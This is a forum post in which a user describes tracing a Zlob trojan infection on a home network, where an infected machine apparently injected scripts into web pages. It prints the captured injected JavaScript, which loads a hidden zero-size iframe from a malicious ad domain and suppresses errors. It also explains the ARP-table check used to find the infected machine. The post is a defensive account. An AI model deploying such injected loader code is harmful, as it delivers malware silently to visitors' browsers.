My Experience With The Zlob Trojan Related to www.userads.info

[Entheone 0]

Some of the following links point to websites that can harm your computer system. Please read the entire post first before clicking any links.

 

 

Hello everyone,

 

 

I recently had a run-in with a very annoying piece of malware on my home LAN network, and I wanted to share this experience with you so that you may avoid some of the mistakes I made.

 

I'm on a home network which consists of 15 PCs, all running either Windows XP or Windows Vista. Most of the users are security-unaware and only a few have anti-virus or anti-spyware programs installed on their machines. I have AVG Full Edition with the auto-update feature turned on, and this is how I found out about this security risk.

 

It started when, whenever I used the Microsoft Internet Explorer browser, AVG would warn me of a trojan called JS/Downloader Agent. It would stop the trojan from running and move it to the quarantine vault. But the minute I surf to another Website, it'd repeat this whole cycle again.

 

I noticed that every time a web page was loading up, the status bar of the browser would say "downloading from ads.userads.info". At first I ignored it, assuming that it was just another advertising network that some websites used, but when it consistently showed up with every single page I visited, I went ahead and looked at the source code of a number of these pages (using the View Source menu option).

 

It turned out that every one of those page had this line of code at the very beginning of the HTML source...

 

<script language="javascript" SRC="http://en.swfads.info/ads.js"></script>

I used Mozilla Firefox to access this JavaScript, and here's what it contained...

 

document.writeln("<script>");document.writeln("function oK_Begin(){");document.writeln("var Then = new Date() ");document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");document.writeln("var cookieString = new String(document.cookie)");document.writeln("var cookieHeader = \"Cookie1=\" ");document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");document.writeln("if (beginPosition != -1){ ");document.writeln("} else ");document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");document.writeln("document.write(\'<iframe width=0 height=0 src=\"http://ad.userads.info/in.htm]\"><\/iframe>\');");document.writeln("}");document.writeln("}");document.writeln("oK_Begin();");document.writeln("<\/script>");document.writeln("<script>window.onerror=function( ){return true;}<\/script>")

Notice that document.writeln("document.write(\'<iframe width=0 height=0 src=\"http://forums.xisto.com/no_longer_exists/;');"); line? in.htm is the name of the file which AVG kept telling me was infected. This JavaScript code opens an iframe that looks like a Microsoft Windows warning pop-up, informing you that you computer may be infected and directing you to download a fake anti-spyware program. After some research, I came across a Wikipedia article that talks about this...

 

The Zlob Trojan, also known as Trojan.Zlob, is a trojan horse which masquerades as a needed video codec in the form of ActiveX. It was first detected in late 2005. However, it wasn't until mid-2006 that it started gaining attention.[1]Once installed, it displays popup ads with appearance similar to real Microsoft Windows warning popups, informing the user that their computer is infected with spyware. Clicking these popups trigger the download of a fake anti-spyware program (such as Virus Heat) in which the trojan horse is hidden.[1]

 

According to F-Secure, a computer security firm, they have discovered 32 variants of this trojan. Other variants continue to be discovered on a daily basis and are added to the detection signatures of various commercial anti-virus products.[2] Some variants of the Zlob family, like the so-called DNSChanger, adds rogue DNS name servers to the Registry of Windows-based computers[3] and network settings of Macintosh computers [4] and therefore could potentially re-route traffic from legitimate web sites to other suspicious web sites.

Anyway, since this javascript loads up an iframe, Firefox was essentially impervious to it -- even though it still showed the same line of code on every page.

 

I assumed that I had somehow caught that virus/trojan myself, and since I needed to change my hard drive anyway, I thought I should just reformat my hard-disk and reinstall Windows. I kept the AVG CD nearby so that I would set it up immediately after installing Windows.

 

I installed Windows, set up AVG, let it download its updates, then fired up Internet Explorer to download Firefox again. Here's the fun part: AVG went through the same warning/quarantine cycle.

 

So it became obvious to me that this was a LAN virus, and that someone else's computer (or more than one) was the one infected. I did some more research, and found this...

 

This is LAN virus which infects some computers in the LAN cloning server's MAC adress and turning them into the proxy servers, and making, frankly speaking, TWO servers in the network. Thus, if there's a virus proxy server - it pastes the code mentioned above in each page and sends these pages to the computers in the LAN.

 

That code slows down the speed very much cause it calls other pages to be loaded.

 

Antivirus will not help much 'cause it either will hang on the browser or with each page says the virus is detected. There's problem not in client (your) computer.

 

If you're in the LAN you can check out the arp table in comand promt -> cmd -> arp -a

The arp table will show two identical MAC's whitch is abnormal in normal work.

 

If you disconnect infected the computer from network, other one infected will take the role of false proxy server.

True enough, I ran the arp -a command from the command prompt, and it showed me that there were 2 different IPs that had the same MAC address. Unfortunately, there was no easy way for me to find out which computer had that virus, so I had to take my laptop, go to each member of our LAN network, set up AVG and scan their computer. After a very long day, we discovered the culprit and fixed the problem, and then set up AVG (or other anti-virus software) on all the computers.

 

I hope you don't have to go through the same trouble. But if you do, then I hope that at least this information makes it easier for you to solve it

[Jezstarr 0]

Something similar to this actually happened to my brother and in the end he had to reformat his pc, I also come across many of these sorts of sites when browsing.My brother downloaded Anti-Virus 2009 as he thought he was infected and needed it. It kept saying he was infected and needed some updates, although the updates downloaded were not very pleasant. I'll leave it at that.